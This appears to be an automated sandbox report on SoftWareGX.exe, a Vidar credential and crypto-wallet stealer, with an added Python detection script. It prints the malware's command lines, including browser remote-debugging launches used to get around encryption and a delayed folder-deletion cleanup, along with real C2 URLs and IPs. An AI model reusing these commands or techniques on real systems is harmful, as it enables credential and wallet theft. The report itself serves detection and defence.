Windows Analysis Report
SoftWareGX.exe

Overview

General Information

Sample name: SoftWareGX.exe
Analysis ID: 1603227
MD5: c57c72458776a0b6a653f6c828c229f2
SHA1: 2f993c6a8499b360dec51240d0b6c5faff561c80
SHA256: d7d05573e26cf40978ecbccb62c1adaf4c2363f5463cc96dc50765da6157aff6

Detection

Vidar
Score: 100 (range 0 - 100)
Whitelisted: false
Confidence: 100%

Signatures

Attempt to bypass Chrome Application-Bound Encryption
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected Vidar stealer
.NET source code contains potential unpacker
.NET source code contains very large strings
.NET source code references suspicious native API functions
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Compiles code to access protected / encrypted code
Creates HTML files with .exe extension (expired dropper behavior)
Found many strings related to Crypto-Wallets (likely being stolen)
Injects a PE file into a foreign processes
Joe Sandbox ML detected suspicious sample
Machine Learning detection for sample
Monitors registry run keys for changes
Sigma detected: Dot net compiler compiles file from suspicious location
Sigma detected: Silenttrinity Stager Msbuild Activity
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Writes to foreign memory regions
Yara detected Generic Downloader
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality to query locales information (e.g. system language)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries information about the installed CPU (vendor, model number etc)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Browser Started with Remote Debugging
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)
Yara detected Credential Stealer
Yara signature match

Process Tree

  • System is w10x64_ra
  • SoftWareGX.exe (PID: 6924 cmdline: "C:\Users\user\Desktop\SoftWareGX.exe" MD5: C57C72458776A0B6A653F6C828C229F2)
    • csc.exe (PID: 6920 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 6988 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 4244 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESEA88.tmp" "c:\Users\user\AppData\Local\Temp\m3uz1vzd\CSC1F5D4801F4546F0859A2F6C82D3A873.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • csc.exe (PID: 5152 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 6248 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 6312 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF054.tmp" "c:\Users\user\AppData\Local\Temp\yomkssf4\CSC4D1794474874449F96D662C038F0859C.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • MSBuild.exe (PID: 6344 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6356 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
    • MSBuild.exe (PID: 6364 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe" MD5: 8FDF47E0FF70C40ED3A17014AEEA4232)
      • chrome.exe (PID: 6272 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 1992 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2516 --field-trial-handle=1952,i,15543430524352428538,12772607436740363522,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • msedge.exe (PID: 4956 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 69222B8101B0601CC6663F8381E7E00F)
        • msedge.exe (PID: 6240 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2392 --field-trial-handle=2136,i,9075986570920464694,11871487164673200351,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
      • cmd.exe (PID: 7280 cmdline: "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exit MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
        • conhost.exe (PID: 7364 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • timeout.exe (PID: 7396 cmdline: timeout /t 10 MD5: 976566BEEFCCA4A159ECBDB2D4B1A3E3)
  • msedge.exe (PID: 4348 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9223 --profile-directory=Default --flag-switches-begin --flag-switches-end --disable-nacl --do-not-de-elevate MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 5652 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2176 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:3 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3476 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-GB --service-sandbox-type=asset_store_service --mojo-platform-channel-handle=4544 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 3028 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-GB --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --mojo-platform-channel-handle=6820 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
    • msedge.exe (PID: 7464 cmdline: "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-GB --service-sandbox-type=search_indexer --message-loop-type-ui --mojo-platform-channel-handle=6748 --field-trial-handle=1944,i,7961870542486980772,7260654766285692806,262144 /prefetch:8 MD5: 69222B8101B0601CC6663F8381E7E00F)
  • cleanup
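The process tree above is the behavioural core of the report: the sample compiles C# on the fly (csc.exe with a .cmdline response file in %LOCALAPPDATA%\Temp), starts MSBuild.exe with no project argument as an injection host, and that hollowed MSBuild.exe launches Chrome and Edge with --remote-debugging-port=9223 (the Application-Bound Encryption bypass) and finally a delayed "timeout & rd /s /q" cleanup. The following is an added example, not Joe Sandbox or Sigma code: four detection checks over Sysmon-style process-creation (EventID 1) and network-connection (EventID 3) records, run over events constructed from the tree above. Field names follow Sysmon's schema but the records are not real log lines, and the explorer.exe parent of the sample and the benign build-server events are assumptions; the rules generalise beyond this sample (any browser image, any MSBuild.exe started bare).

```python
"""Process-tree detections for the behaviours in this report (added example,
not Joe Sandbox or Sigma code). Checks, over Sysmon-style events:
  1. browser started with --remote-debugging-port by a non-browser parent,
  2. csc.exe compiling a .cmdline response file under %LOCALAPPDATA%\\Temp,
  3. MSBuild.exe started without a project argument that then connects out,
  4. cmd.exe running "timeout /t N & rd /s /q ..." (delayed self-cleanup).
The sample events are constructed from the report's process tree; the
explorer.exe parent and the benign build-server events are assumptions.
"""
import ipaddress
import re
from dataclasses import dataclass


@dataclass
class Event:
    event_id: int            # 1 = process create, 3 = network connection
    pid: int
    image: str
    cmdline: str = ""
    parent_image: str = ""
    parent_pid: int = 0
    dest_ip: str = ""
    dest_port: int = 0


BROWSERS = {"chrome.exe", "msedge.exe", "brave.exe", "opera.exe", "vivaldi.exe"}
REMOTE_DEBUG_RE = re.compile(r"--remote-debugging-(?:port|pipe)", re.I)
TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.I)
CLEANUP_RE = re.compile(r"timeout\s+/t\s+\d+\s*&\s*rd\s+/s\s+/q", re.I)


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


def args_after_image(cmdline: str) -> str:
    """Return the command line with its (possibly quoted) image path removed."""
    s = cmdline.strip()
    if s.startswith('"'):
        end = s.find('"', 1)
        return s[end + 1:].strip() if end > 0 else ""
    return s.split(" ", 1)[1].strip() if " " in s else ""


def detect(events):
    """Return (rule, pid, detail) tuples in event order."""
    findings = []
    bare_msbuild = set()   # PIDs of MSBuild.exe started with no arguments at all
    for ev in events:
        if ev.event_id == 1:
            img, parent = basename(ev.image), basename(ev.parent_image)
            if img in BROWSERS and REMOTE_DEBUG_RE.search(ev.cmdline) and parent not in BROWSERS:
                findings.append(("browser_remote_debugging", ev.pid, parent))
            elif img == "csc.exe" and TEMP_RE.search(ev.cmdline) and ".cmdline" in ev.cmdline.lower():
                findings.append(("dynamic_csc_from_temp", ev.pid, parent))
            elif img == "msbuild.exe" and not args_after_image(ev.cmdline):
                bare_msbuild.add(ev.pid)
            elif img == "cmd.exe" and CLEANUP_RE.search(ev.cmdline):
                findings.append(("delayed_self_cleanup", ev.pid, parent))
        elif ev.event_id == 3 and ev.pid in bare_msbuild:
            # A project-less MSBuild.exe has no reason to talk to the internet.
            if not ipaddress.ip_address(ev.dest_ip).is_private:
                findings.append(("bare_msbuild_network", ev.pid, f"{ev.dest_ip}:{ev.dest_port}"))
    return findings


SAMPLE = r"C:\Users\user\Desktop\SoftWareGX.exe"
FW = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319"
CHROME = r"C:\Program Files\Google\Chrome\Application\chrome.exe"

# Constructed from the report's process tree (PIDs and command lines as shown above).
SAMPLE_EVENTS = [
    Event(1, 6924, SAMPLE, f'"{SAMPLE}"', r"C:\Windows\explorer.exe", 1234),   # parent assumed
    Event(1, 6920, FW + r"\csc.exe",
          f'"{FW}\\csc.exe" /noconfig /fullpaths @"C:\\Users\\user\\AppData\\Local\\Temp\\m3uz1vzd\\m3uz1vzd.cmdline"',
          SAMPLE, 6924),
    Event(1, 6364, FW + r"\MSBuild.exe", f'"{FW}\\MSBuild.exe"', SAMPLE, 6924),
    Event(3, 6364, FW + r"\MSBuild.exe", dest_ip="149.154.167.99", dest_port=443),
    Event(1, 6272, CHROME, f'"{CHROME}" --remote-debugging-port=9223 --profile-directory="Default"',
          FW + r"\MSBuild.exe", 6364),
    Event(1, 1992, CHROME, f'"{CHROME}" --type=utility --utility-sub-type=network.mojom.NetworkService',
          CHROME, 6272),
    Event(1, 7280, r"C:\Windows\system32\cmd.exe",
          r'"C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\xl6pp" & exit',
          FW + r"\MSBuild.exe", 6364),
    # Benign control (assumed): a build run with a project file, then a private package feed.
    Event(1, 8000, FW + r"\MSBuild.exe", f'"{FW}\\MSBuild.exe" App.sln /t:Build',
          r"C:\Windows\system32\cmd.exe", 7999),
    Event(3, 8000, FW + r"\MSBuild.exe", dest_ip="10.0.0.5", dest_port=443),
]

if __name__ == "__main__":
    for rule, pid, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:26} pid={pid:<6} {detail}")
```

The browser check is the one the "Browser Started with Remote Debugging" Sigma match in this report corresponds to; a developer launching Chrome with that flag from a terminal fires it too, so the parent image is the field to tune on rather than the flag itself. Note that the top-level msedge.exe PID 4348 in the tree above also carries --remote-debugging-port=9223 without a recorded parent, which is why a hunt should key on the flag first and use the parent only to rank.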

Malware Configuration

{"C2 url": "https://steamcommunity.com/profiles/76561199820567237", "Botnet": "hac22tl"}

Yara Overview

PCAP (network traffic)

Source: sslproxydump.pcap
Rule: JoeSecurity_Vidar_1 (Yara detected Vidar stealer), author: Joe Security

Dumped memory

Source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: JoeSecurity_Vidar_1 (Yara detected Vidar stealer), author: Joe Security

Source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp
Rule: infostealer_win_vidar_strings_nov23 (Finds Vidar samples based on the specific strings), author: Sekoia.io
Matched strings:
  • 0x40bb9: $str01: MachineID:
  • 0x40be2: $str02: Work Dir: In memory
  • 0x40c7c: $str03: [Hardware]
  • 0x40cb1: $str04: VideoCard:
  • 0x40cbe: $str05: [Processes]
  • 0x40ccb: $str06: [Software]
  • 0x40cd7: $str07: information.txt
  • 0x40ce8: $str08: %s\*
  • 0x40e1f: $str08: %s\*
  • 0x3fafc: $str11: Software\Martin Prikryl\WinSCP 2\Configuration
  • 0x3f660: $str17: build_id
  • 0x3f698: $str18: file_data

Process memory

Source: Process Memory Space: SoftWareGX.exe PID: 6924
Rule: JoeSecurity_AntiVM_3 (Yara detected AntiVM_3), author: Joe Security

Source: Process Memory Space: MSBuild.exe PID: 6364
Rule: JoeSecurity_Vidar_1 (Yara detected Vidar stealer), author: Joe Security

Source: Process Memory Space: MSBuild.exe PID: 6364
Rule: JoeSecurity_CredentialStealer (Yara detected Credential Stealer), author: Joe Security

Unpacked PEs

Source: 15.2.MSBuild.exe.400000.0.raw.unpack
Rule: JoeSecurity_Vidar_1 (Yara detected Vidar stealer), author: Joe Security

Source: 15.2.MSBuild.exe.400000.0.raw.unpack
Rule: infostealer_win_vidar_strings_nov23 (Finds Vidar samples based on the specific strings), author: Sekoia.io
Matched strings: the same twelve hits at the same offsets as in the dumped-memory match above (0x40bb9 $str01 through 0x3f698 $str18)

Source: 5.2.SoftWareGX.exe.3cd94d0.0.raw.unpack
Rule: JoeSecurity_GenericDownloader_1 (Yara detected Generic Downloader), author: Joe Security

Sigma Overview

System Summary

Source: Network Connection
Author: Kiran kumar s, oscd.community
Data: DestinationIp: 149.154.167.99, DestinationIsIpv6: false, DestinationPort: 443, EventID: 3, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, Initiated: true, ProcessId: 6364, Protocol: tcp, SourceIp: 192.168.2.16, SourceIsIpv6: false, SourcePort: 49707

Source: Process started
Author: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe", ParentImage: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, ParentProcessId: 6364, ParentProcessName: MSBuild.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 6272, ProcessName: chrome.exe

Source: Process started
Author: Florian Roth (Nextron Systems), X__Junior (Nextron Systems)
Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SoftWareGX.exe", ParentImage: C:\Users\user\Desktop\SoftWareGX.exe, ParentProcessId: 6924, ParentProcessName: SoftWareGX.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", ProcessId: 6920, ProcessName: csc.exe

Source: File created
Author: frack113
Data: EventID: 11, Image: C:\Users\user\Desktop\SoftWareGX.exe, ProcessId: 6924, TargetFilename: C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline

Data Obfuscation

Source: Process started
Author: Joe Security
Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\SoftWareGX.exe", ParentImage: C:\Users\user\Desktop\SoftWareGX.exe, ParentProcessId: 6924, ParentProcessName: SoftWareGX.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.cmdline", ProcessId: 6920, ProcessName: csc.exe

Suricata Overview

Timestamp                       | SID     | Severity | Classtype                                     | Source IP     | Source port | Destination IP | Destination port | Protocol
2025-01-30T18:10:58.896089+0100 | 2044247 | 1        | Malware Command and Control Activity Detected | 116.202.5.153 | 443         | 192.168.2.16   | 49712            | TCP
2025-01-30T18:11:00.542949+0100 | 2051831 | 1        | Malware Command and Control Activity Detected | 116.202.5.153 | 443         | 192.168.2.16   | 49713            | TCP
2025-01-30T18:11:00.542706+0100 | 2049087 | 1        | A Network Trojan was detected                 | 192.168.2.16  | 49713       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:01.987589+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49714       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:03.084351+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49715       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:11.168298+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49731       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:11.404817+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49734       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:12.444717+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49735       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:13.475030+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49736       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:15.328064+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49737       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:21.448485+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49775       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:21.694596+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49781       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:22.735063+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49794       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:23.943537+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49822       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:25.115074+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49834       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:27.116957+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49836       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:28.240957+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49850       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:32.951931+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49887       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:35.094153+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49931       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:37.038566+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49951       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:38.084817+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49960       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:39.044779+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49965       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:40.451478+0100 | 2059331 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49976       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:44.715086+0100 | 2803270 | 2        | Potentially Bad Traffic                       | 192.168.2.16  | 49989       | 162.125.66.18  | 443              | TCP
2025-01-30T18:11:11.404817+0100 | 2859636 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49734       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:12.444717+0100 | 2859636 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49735       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:13.475030+0100 | 2859636 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49736       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:21.694596+0100 | 2859636 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49781       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:22.735063+0100 | 2859636 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49794       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:23.943537+0100 | 2859636 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49822       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:25.115074+0100 | 2859636 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49834       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:27.116957+0100 | 2859636 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49836       | 116.202.5.153  | 443              | TCP
2025-01-30T18:11:28.240957+0100 | 2859636 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49850       | 116.202.5.153  | 443              | TCP
2025-01-30T18:10:56.127482+0100 | 2859378 | 1        | Malware Command and Control Activity Detected | 192.168.2.16  | 49709       | 116.202.5.153  | 443              | TCP

                AV Detection

Source: 0000000F.00000002.2005647226.0000000000400000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: Vidar {"C2 url": "https://steamcommunity.com/profiles/76561199820567237", "Botnet": "hac22tl"}
Source: SoftWareGX.exe | Virustotal: Detection: 13%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.5% probability
Source: SoftWareGX.exe | Joe Sandbox ML: detected
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00409C4D CryptUnprotectData, 15_2_00409C4D
Source: unknown | HTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.16:49707 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.16:49708 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 116.202.5.153:443 -> 192.168.2.16:49737 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 162.125.66.18:443 -> 192.168.2.16:49989 version: TLS 1.2
Source: SoftWareGX.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: MSBuildsers\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb | source: SoftWareGX.exe, 00000005.00000002.1304719584.0000000002019000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: q6C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb | source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: q6C:\Users\user\AppData\Local\Temp\yomkssf4\yomkssf4.pdb| | source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003D6B000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: q6C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.pdb| | source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: q6C:\Users\user\AppData\Local\Temp\m3uz1vzd\m3uz1vzd.pdb | source: SoftWareGX.exe, 00000005.00000002.1305403965.0000000003CC1000.00000004.00000800.00020000.00000000.sdmp
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00421A6B FindFirstFileA, 15_2_00421A6B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00420AD3 FindFirstFileA, 15_2_00420AD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040F379 FindFirstFileA, CopyFileA, DeleteFileA, FindNextFileA, 15_2_0040F379
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040BC0C FindFirstFileA, CopyFileA, CopyFileA, FindNextFileA, 15_2_0040BC0C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00422DC5 FindFirstFileA, FindNextFileA, 15_2_00422DC5
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040A5E0 FindFirstFileA, FindNextFileA, CopyFileA, DeleteFileA, memset, CopyFileA, DeleteFileA, memset, 15_2_0040A5E0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_00401590 FindFirstFileA, 15_2_00401590
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0040CF73 FindFirstFileA, FindNextFileA, 15_2_0040CF73
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | Code function: 15_2_0041FF89 FindFirstFileA, memset, memset, memset, memset, DeleteFileA, CopyFileA, __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z, FindNextFileA, 15_2_0041FF89
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\
